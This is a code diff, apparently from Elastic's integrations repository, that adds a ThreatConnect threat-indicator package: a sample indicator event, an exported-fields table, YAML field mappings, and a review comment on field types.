"active": { + "locked": false, + "value": true + }, + "address": "testing@poverts.com", + "confidence": 61, + "date_added": "2023-08-25T12:57:24.000Z", + "id": "891599", + "last_modified": "2023-12-05T06:50:06.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic", + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "rating": 3, + "summary": "testing@poverts.com", + "type": "EmailAddress", + "web_link": "https://app.threatconnect.com/#/details/indicators/891599/overview" + }, + { + "active": { + "locked": false, + "value": true + }, + "date_added": "2023-08-24T06:28:17.000Z", + "id": "738667", + "last_modified": "2023-12-05T06:47:59.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic", + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "summary": "http://www.testingmcafeesites.com/testcat_pc.html", + "text": "http://www.testingmcafeesites.com/testcat_pc.html", + "type": "URL", + "web_link": "https://app.threatconnect.com/#/details/indicators/738667/overview" + } + ] + }, + "date_added": "2023-08-24T06:19:58.000Z", + "deleted_at": "2024-03-04T06:38:53.000Z", + "expiration_duration": "90d", + "id": "736758", + "last_modified": "2023-12-05T06:38:53.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic", + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "security_labels": { + "data": [ + { + "color": "FFC000", + "date_added": "2016-08-31T00:00:00.000Z", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. 
Information with this label can be shared with members of an organization and its clients.", + "id": "3", + "name": "TLP:AMBER", + "owner": "System" + } + ] + }, + "summary": "test.user@elastic.co", + "tags": { + "data": [ + { + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. 
Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "id": "463701", + "last_used": "2023-12-04T06:44:44.000Z", + "name": "Financial Theft", + "platforms": { + "count": 6, + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ] + }, + "technique": { + "id": "T1657" + } + } + ] + }, + "threat_assess": { + "confidence": 0, + "rating": 0, + "score": { + "false_positive": 0, + "observed": 0, + "value": 281 + } + }, + "type": "EmailAddress", + "web_link": "https://app.threatconnect.com/#/details/indicators/736758/overview" + } + }, + "user": { + "domain": "elastic.co", + "email": "test.user@elastic.co", + "name": "test.user" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| event.dataset | Event dataset. 
| constant_keyword | +| event.module | Event module. | constant_keyword | +| input.type | Type of filebeat input. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| log.offset | Log offset. | long | +| tags | User defined tags. | keyword | +| threat.feed.name | Display friendly feed name. | constant_keyword | +| threat_connect.indicator.active.locked | Indicates whether the active status is locked. | boolean | +| threat_connect.indicator.active.value | Indicates whether the indicator is active. | boolean | +| threat_connect.indicator.address | The email address associated with the Email Address Indicator. | keyword | +| threat_connect.indicator.as_number | The AS number associated with the ASN Indicator. | keyword | +| threat_connect.indicator.associated_artifacts | A list of Artifacts associated to the Indicator. | flattened | +| threat_connect.indicator.associated_cases | A list of Cases associated to the Indicator. | flattened | +| threat_connect.indicator.associated_groups.data.assignments.data.type | Valid values for the type of assignment are Assigned and Escalate. | keyword | +| threat_connect.indicator.associated_groups.data.assignments.data.user.id | Unique identifier of users assigned to the Task or to whom the Task will be escalated. | keyword | +| threat_connect.indicator.associated_groups.data.body | The Emails body. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.first_name | First name of user. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.id | Unique Identifier of the user who created the group. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.last_name | Last name of user. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.owner | Owner of attribute creator. 
| keyword | +| threat_connect.indicator.associated_groups.data.created_by.pseudonym | Pseudonym or alias of the user. | keyword | +| threat_connect.indicator.associated_groups.data.created_by.user_name | Username of user. | keyword | +| threat_connect.indicator.associated_groups.data.date_added | Date and time group was added. | date | +| threat_connect.indicator.associated_groups.data.document.date_added | Date and time when the document was added. | date | +| threat_connect.indicator.associated_groups.data.document.type | The type of document. | keyword | +| threat_connect.indicator.associated_groups.data.down_vote_count | Downvote Intel Rating. | keyword | +| threat_connect.indicator.associated_groups.data.due_date | The date and time when the Task is due. | date | +| threat_connect.indicator.associated_groups.data.email_date | The date associated with an email. | date | +| threat_connect.indicator.associated_groups.data.escalation_date | The date and time when the Task should be escalated. | date | +| threat_connect.indicator.associated_groups.data.event_date | The date and time when the Event took place. | date | +| threat_connect.indicator.associated_groups.data.external.date.added | The date and time when the Group was created externally. | date | +| threat_connect.indicator.associated_groups.data.external.date.expires | The date and time when the Group expires externally. | date | +| threat_connect.indicator.associated_groups.data.external.last_modified | The date and time when the Group was last modified externally. | date | +| threat_connect.indicator.associated_groups.data.file.name | The file name of the Document. | keyword | +| threat_connect.indicator.associated_groups.data.file.size | The File size of the document. | keyword | +| threat_connect.indicator.associated_groups.data.file.text | The file text of the Signature. 
| keyword | +| threat_connect.indicator.associated_groups.data.file.type | The file type of the SignaturePossible values are Bro, ClamAV, CybOX, Iris Search Hash, KQL, OpenIOC, Regex, SPL, Sigma, Snort, Suricata, TQL Query and YARA. | keyword | +| threat_connect.indicator.associated_groups.data.first_seen | The date and time when the Group was first seen. | date | +| threat_connect.indicator.associated_groups.data.from | The Emails subject. | keyword | +| threat_connect.indicator.associated_groups.data.generated_report | Indicates whether the report is generated. | boolean | +| threat_connect.indicator.associated_groups.data.header | The Emails header. | keyword | +| threat_connect.indicator.associated_groups.data.id | Unique Identifier of Group. | keyword | +| threat_connect.indicator.associated_groups.data.last_modified | Date and time when the document was last updated. | date | +| threat_connect.indicator.associated_groups.data.last_seen | The date and time when the Group was last seen. | date | +| threat_connect.indicator.associated_groups.data.legacy_link | Legacy link to the group's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.associated_groups.data.malware | Indicates whether the Document is malware. | boolean | +| threat_connect.indicator.associated_groups.data.name | The Groups name. | keyword | +| threat_connect.indicator.associated_groups.data.owner.id | The ID of the owner to which the Group belongs. | keyword | +| threat_connect.indicator.associated_groups.data.owner.name | The name of the owner to which the Group belongs. | keyword | +| threat_connect.indicator.associated_groups.data.password | The password associated with the Document. | keyword | +| threat_connect.indicator.associated_groups.data.publish_date | The date and time when the Report was published. | date | +| threat_connect.indicator.associated_groups.data.reminder_date | The date and time when a reminder about the Task will be sent. 
| date | +| threat_connect.indicator.associated_groups.data.score_breakdown | A breakdown or explanation of the score, providing additional information about how the score was determined. | keyword | +| threat_connect.indicator.associated_groups.data.score_includes_body | Indicates whether the score includes information from the email body. | boolean | +| threat_connect.indicator.associated_groups.data.status | The status of the Group type. | keyword | +| threat_connect.indicator.associated_groups.data.subject | The Emails From field. | keyword | +| threat_connect.indicator.associated_groups.data.to | The receiver email address. | keyword | +| threat_connect.indicator.associated_groups.data.type | The type of Group being created. Possiblevalues :Adversary, AttackPattern, Campaign, CourseofAction, Document, Email, Event, Incident, IntrusionSet, Malware, Report, Signature, Tactic, Task, Threat, Tool and Vulnerability. | keyword | +| threat_connect.indicator.associated_groups.data.up_vote | Use this field to update the Groups Intel Rating. | boolean | +| threat_connect.indicator.associated_groups.data.up_vote_count | Upvote Intel Rating. | keyword | +| threat_connect.indicator.associated_groups.data.web_link | Link to the group's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.associated_groups.data.xid | The Groups XID. | keyword | +| threat_connect.indicator.associated_indicators.data.active.locked | Indicates whether the active status is locked. | boolean | +| threat_connect.indicator.associated_indicators.data.active.value | Indicates whether the indicator is active. | boolean | +| threat_connect.indicator.associated_indicators.data.address | The email address associated with the Email Address Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.as_number | The AS number associated with the ASN Indicator. 
| keyword | +| threat_connect.indicator.associated_indicators.data.block | The block of network IP addresses associated with the CIDR Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.confidence | The Indicators Confidence Rating. | long | +| threat_connect.indicator.associated_indicators.data.date_added | Date and time when the indicator was added. | date | +| threat_connect.indicator.associated_indicators.data.description | Description of the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.dns_active | Indicates whether the DNS feature is active for the Host Indicator. | boolean | +| threat_connect.indicator.associated_indicators.data.external.date.added | The date and time when the Indicator was created externally. | date | +| threat_connect.indicator.associated_indicators.data.external.date.expires | The date and time when the Indicator expires externally. | date | +| threat_connect.indicator.associated_indicators.data.external.last_modified | The date and time when the Indicator was last modified externally. | date | +| threat_connect.indicator.associated_indicators.data.first_seen | The date and time when the Indicator was first seen. | date | +| threat_connect.indicator.associated_indicators.data.hashtag | The hashtag term associated with the Hashtag Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.host_name | The host name associated with the Host Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.id | Unique identifier for the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.ip | The IP address associated with the Address Indicator. | ip | +| threat_connect.indicator.associated_indicators.data.key_name | The name of the registry key associated with the Registry Key Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.last_modified | Date and time when the indicator was last modified. 
| date | +| threat_connect.indicator.associated_indicators.data.last_seen | The date and time when the Indicator was last seen. | date | +| threat_connect.indicator.associated_indicators.data.legacy_link | Legacy link to the indicator's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.associated_indicators.data.md5 | MD5 hash value associated with the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.mutex | The synchronization primitive used to identify malware files that is associated with the Mutex. | keyword | +| threat_connect.indicator.associated_indicators.data.owner.id | Identifier for the owner of the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.owner.name | Name of the organization that owns the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.private_flag | Indicates whether the indicator is marked as private. | boolean | +| threat_connect.indicator.associated_indicators.data.rating | The Indicators Threat Rating. | double | +| threat_connect.indicator.associated_indicators.data.sha1 | The SHA1 hash associated with the File Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.sha256 | The SHA256 hash associated with the File Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.size | The size of the file associated with the File Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.subject | The subject line of the email associated with the Email Subject Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.summary | Summary or description of the indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.text | The URL associated with the URL Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.type | Type of the indicator. 
| keyword | +| threat_connect.indicator.associated_indicators.data.user_agent_string | The characteristic identification string associated with the User Agent Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.value.name | The registry value associated with the Registry Key Indicator. | keyword | +| threat_connect.indicator.associated_indicators.data.value.type | Possible values: REG_NONE, REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN, REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK, REG_MULTI_SZ, REG_QWORD, REG_QWORD_LITTLE_ENDIAN and REG_SZ. | keyword | +| threat_connect.indicator.associated_indicators.data.web_link | Link to the indicator's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.associated_indicators.data.whois_active | Indicates whether the Whois feature is active for the Host Indicator. | boolean | +| threat_connect.indicator.attributes.data.created_by.first_name | First name of the user who created the victim attribute. | keyword | +| threat_connect.indicator.attributes.data.created_by.id | Unique Identifier of the user who created the attribute. | keyword | +| threat_connect.indicator.attributes.data.created_by.last_name | Lastname of the user who created the victim attribute. | keyword | +| threat_connect.indicator.attributes.data.created_by.owner | Owner of attribute creator. | keyword | +| threat_connect.indicator.attributes.data.created_by.pseudonym | Pseudonym or alias of the user. | keyword | +| threat_connect.indicator.attributes.data.created_by.user_name | Username of the user who created the victim attribute. | keyword | +| threat_connect.indicator.attributes.data.date_added | Date and time when the attribute was added. | date | +| threat_connect.indicator.attributes.data.default | Indicates whether the Attribute is the default Attribute of its type for the Indicator to which it is added (this field applies to certain Attribute and data types only). 
| boolean | +| threat_connect.indicator.attributes.data.id | Unique Identifier of attribute. | keyword | +| threat_connect.indicator.attributes.data.last_modified | Date and time when attribute was modified. | date | +| threat_connect.indicator.attributes.data.pinned | Indicates whether the Attribute is to be displayed as a Pinned Attribute on the Details screen for the Indicator to which the Attribute is added. | boolean | +| threat_connect.indicator.attributes.data.source | The Attributes source. | keyword | +| threat_connect.indicator.attributes.data.type | The Attributes type. | keyword | +| threat_connect.indicator.attributes.data.value | The Attributes value. | keyword | +| threat_connect.indicator.block | The block of network IP addresses associated with the CIDR Indicator. | keyword | +| threat_connect.indicator.confidence | The Indicators Confidence Rating. | long | +| threat_connect.indicator.custom_associations | Includes indicators with custom associations to the indicator. | flattened | +| threat_connect.indicator.date_added | Date and time when the indicator was added. | date | +| threat_connect.indicator.deleted_at | Date when the IOC was expired/deleted. | date | +| threat_connect.indicator.description | Description of the indicator. | keyword | +| threat_connect.indicator.dns_active | Indicates whether the DNS feature is active for the Host Indicator. | boolean | +| threat_connect.indicator.dns_resolution | Includes DNS resolution data related to the Host indicators. | flattened | +| threat_connect.indicator.enrichment | Includes Enrichment data related to the indicator. | flattened | +| threat_connect.indicator.expiration_duration | Duration when the IOC will expire. | keyword | +| threat_connect.indicator.external.date.added | The date and time when the Indicator was created externally. | date | +| threat_connect.indicator.external.date.expires | The date and time when the Indicator expires externally. 
| date | +| threat_connect.indicator.external_last.modified | The date and time when the Indicator was last modified externally. | date | +| threat_connect.indicator.false_positive_reported_by_user | Indicates whether false positive is reported by user. | boolean | +| threat_connect.indicator.false_positives | Count of false positives. | long | +| threat_connect.indicator.file_actions | A list of File Actions associated with the File Indicator. | flattened | +| threat_connect.indicator.file_occurrences | A list of File Occurrences associated with the File Indicator. | flattened | +| threat_connect.indicator.first_seen | The date and time when the Indicator was first seen. | date | +| threat_connect.indicator.generic_custom_indicator_values | Includes the fields over-writing the custom field names: value1, value2, and value3. | flattened | +| threat_connect.indicator.geo_location | Includes GEO location information related to the Host and IP indicators. | flattened | +| threat_connect.indicator.hashtag | The hashtag term associated with the Hashtag Indicator. | keyword | +| threat_connect.indicator.host_name | The host name associated with the Host Indicator. | keyword | +| threat_connect.indicator.id | Unique identifier for the indicator. | keyword | +| threat_connect.indicator.investigation_links | Includes investigation links related to the indicator type. | flattened | +| threat_connect.indicator.ip | The IP address associated with the Address Indicator. | ip | +| threat_connect.indicator.key_name | The name of the registry key associated with the Registry Key Indicator. | keyword | +| threat_connect.indicator.last_false_positive | Date and time of last false positive. | date | +| threat_connect.indicator.last_modified | Date and time when the indicator was last modified. | date | +| threat_connect.indicator.last_seen | The date and time when the Indicator was last seen. 
| date | +| threat_connect.indicator.legacy_link | Legacy link to the indicator's details in the ThreatConnect web application. | keyword | +| threat_connect.indicator.md5 | MD5 hash value associated with the indicator. | keyword | +| threat_connect.indicator.mutex | The synchronization primitive used to identify malware files that is associated with the Mutex. | keyword | +| threat_connect.indicator.observations | Includes the Observations fields. | flattened | +| threat_connect.indicator.owner.id | Identifier for the owner of the indicator. | keyword | +| threat_connect.indicator.owner.name | Name of the organization that owns the indicator. | keyword | +| threat_connect.indicator.private_flag | Indicates whether the indicator is marked as private. | boolean | +| threat_connect.indicator.rating | The Indicators Threat Rating. | double | +| threat_connect.indicator.security_labels.data.color | Color associated with the security label. | keyword | +| threat_connect.indicator.security_labels.data.date_added | The date and time when the security label was added. | date | +| threat_connect.indicator.security_labels.data.description | Description of the security label. | keyword | +| threat_connect.indicator.security_labels.data.id | Unique identifier for the security label. | keyword | +| threat_connect.indicator.security_labels.data.name | Actual name or label of the security classification. | keyword | +| threat_connect.indicator.security_labels.data.owner | The entity or system that owns or manages the security label. | keyword | +| threat_connect.indicator.security_labels.data.source | The source of the security label. | keyword | +| threat_connect.indicator.sha1 | The SHA1 hash associated with the File Indicator. | keyword | +| threat_connect.indicator.sha256 | The SHA256 hash associated with the File Indicator. | keyword | +| threat_connect.indicator.size | The size of the file associated with the File Indicator. 
| keyword | +| threat_connect.indicator.source | The Indicators source. | keyword | +| threat_connect.indicator.subject | The subject line of the email associated with the Email Subject Indicator. | keyword | +| threat_connect.indicator.summary | Summary or description of the indicator. | keyword | +| threat_connect.indicator.tags.data.description | The Tags description. | keyword | +| threat_connect.indicator.tags.data.id | Unique Identifier of tag. | keyword | +| threat_connect.indicator.tags.data.last_used | Date and time when tag was last used. | date | +| threat_connect.indicator.tags.data.name | Name of tag. | keyword | +| threat_connect.indicator.tags.data.owner | The Organization, Community, or Source to which the Tag belongs. | keyword | +| threat_connect.indicator.tags.data.platforms.count | Count of platforms. | long | +| threat_connect.indicator.tags.data.platforms.data | Platform on which tag is added. | keyword | +| threat_connect.indicator.tags.data.technique.id | Unique Identifier of tag technique. | keyword | +| threat_connect.indicator.text | The URL associated with the URL Indicator. | keyword | +| threat_connect.indicator.threat_assess.confidence | The confidence level associated with the threat assessment. | double | +| threat_connect.indicator.threat_assess.rating | A numerical rating indicating the threat assessment level. | double | +| threat_connect.indicator.threat_assess.score.false_positive | The count of false positives associated with the threat assessment score. | long | +| threat_connect.indicator.threat_assess.score.observed | The observed value associated with the threat assessment score. | long | +| threat_connect.indicator.threat_assess.score.value | The overall score assigned to the threat, indicating its severity or risk. | long | +| threat_connect.indicator.tracked_users | Includes Observations and False Positive stats of tracked users. 
| flattened |
+| threat_connect.indicator.type | Type of the indicator (e.g., File, IP address). | keyword |
+| threat_connect.indicator.user_agent_string | The characteristic identification string associated with the User Agent Indicator. | keyword |
+| threat_connect.indicator.value.name | The registry value associated with the Registry Key Indicator. | keyword |
+| threat_connect.indicator.value.type | Possible values: REG_NONE, REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN, REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK, REG_MULTI_SZ, REG_QWORD, REG_QWORD_LITTLE_ENDIAN and REG_SZ. | keyword |
+| threat_connect.indicator.web_link | Link to the indicator's details in the ThreatConnect web application. | keyword |
+| threat_connect.indicator.who_is | Includes WhoIs information related to the Host indicators. | flattened |
+| threat_connect.indicator.whois_active | Indicates whether the Whois feature is active for the Host Indicator. | boolean |
+
diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/fields/agent.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/agent.yml
new file mode 100644
index 00000000000..da4e652c53b
--- /dev/null
+++ b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/agent.yml
@@ -0,0 +1,198 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + 
diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/fields/base-fields.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/base-fields.yml
new file mode 100644
index 00000000000..5117c5c2edf
--- /dev/null
+++ b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/base-fields.yml
@@ -0,0 +1,16 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
+- name: threat.feed.name
+ type: constant_keyword
+ description: Display friendly feed name.
+ value: ThreatConnect Indicator
diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/fields/beats.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/beats.yml
new file mode 100644
index 00000000000..b3701b581cf
--- /dev/null
+++ b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/beats.yml
@@ -0,0 +1,9 @@
+- name: input.type
+ type: keyword
+ description: Type of filebeat input.
+- name: log.offset
+ type: long
+ description: Log offset.
+- name: tags
+ type: keyword
+ description: User defined tags.
diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/fields/ecs.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/ecs.yml
new file mode 100644
index 00000000000..756416541c7
--- /dev/null
+++ b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/ecs.yml
@@ -0,0 +1,64 @@
+- name: email.from.address
+ type: keyword
+- name: email.subject
+ type: keyword
+- name: email.to.address
+ type: keyword
+- name: event.category
+ type: keyword
+- name: event.id
+ type: keyword
+- name: event.kind
+ type: keyword
+- name: event.type
+ type: keyword
+- name: observer.hostname
+ type: keyword
+- name: os.family
+ type: keyword
+- name: related.hash
+ type: keyword
+- name: related.ip
+ type: ip
+- name: related.user
+ type: keyword
+- name: threat.indicator.as.number
+ type: long
+- name: threat.indicator.confidence
+ type: keyword
+- name: threat.indicator.description
+ type: keyword
+- name: threat.indicator.email.address
+ type: keyword
+- name: threat.indicator.file.hash.md5
+ type: keyword
+- name: threat.indicator.file.hash.sha1
+ type: keyword
+- name: threat.indicator.file.hash.sha256
+ type: keyword
+- name: threat.indicator.first_seen
+ type: date
+- name: threat.indicator.ip
+ type: ip
+- name: threat.indicator.last_seen
+ type: date
+- name: threat.indicator.marking.tlp
+ type: keyword
+- name: threat.indicator.modified_at
+ type: date
+- name: threat.indicator.reference
+ type: keyword
+- name: threat.indicator.registry.data.type
+ type: keyword
+- name: threat.indicator.registry.path
+ type: keyword
+- name: threat.indicator.registry.value
+ type: keyword
+- name: threat.indicator.type
+ type: keyword
+- name: threat.indicator.url.original
+ type: keyword
+- name: threat.technique.id
+ type: keyword
+- name: user_agent.original
+ type: keyword
diff --git a/packages/ti_threatconnect/elasticsearch/transform/latest/fields/fields.yml b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/fields.yml
new file mode 100644
index 00000000000..b193da3a3eb
--- /dev/null
+++ b/packages/ti_threatconnect/elasticsearch/transform/latest/fields/fields.yml
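Review bot: `threat.indicator.url.original` and `threat.indicator.description` are declared `type: keyword` in this hunk, whereas ECS maps both as `wildcard`; URL indicators and free-text descriptions routinely exceed a keyword field's `ignore_above` limit (the agent.yml added in this same change sets 1024 on its keywords, and as far as I know Fleet applies the same default when none is given), and a value over that limit is kept in `_source` but never indexed. Since this `latest` index is presumably what an indicator-match rule queries, an over-long URL indicator would be present in the index yet silently never match. I would change the two entries to `- name: threat.indicator.url.original` / `type: wildcard` and `- name: threat.indicator.description` / `type: wildcard`, and give `user_agent.original` the ECS `.text` multi-field if free-text search on it is wanted. The remaining types (`ip`, `date`, `long`) line up with ECS.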
@@ -0,0 +1,648 @@ +- name: threat_connect + type: group + fields: + - name: indicator + type: group + fields: + - name: active + type: group + fields: + - name: locked + type: boolean + description: Indicates whether the active status is locked. + - name: value + type: boolean + description: Indicates whether the indicator is active. + - name: address + type: keyword + description: The email address associated with the Email Address Indicator. + - name: as_number + type: keyword + description: The AS number associated with the ASN Indicator. + - name: associated_artifacts + type: flattened + description: A list of Artifacts associated to the Indicator. + - name: associated_cases + type: flattened + description: A list of Cases associated to the Indicator. + - name: associated_groups + type: group + fields: + - name: data + type: group + fields: + - name: assignments + type: group + fields: + - name: data + type: group + fields: + - name: type + type: keyword + description: Valid values for the type of assignment are Assigned and Escalate. + - name: user + type: group + fields: + - name: id + type: keyword + description: Unique identifier of users assigned to the Task or to whom the Task will be escalated. + - name: body + type: keyword + description: The Emails body. + - name: created_by + type: group + fields: + - name: first_name + type: keyword + description: First name of user. + - name: id + type: keyword + description: Unique Identifier of the user who created the group. + - name: last_name + type: keyword + description: Last name of user. + - name: owner + type: keyword + description: Owner of attribute creator. + - name: pseudonym + type: keyword + description: Pseudonym or alias of the user. + - name: user_name + type: keyword + description: Username of user. + - name: date_added + type: date + description: Date and time group was added. 
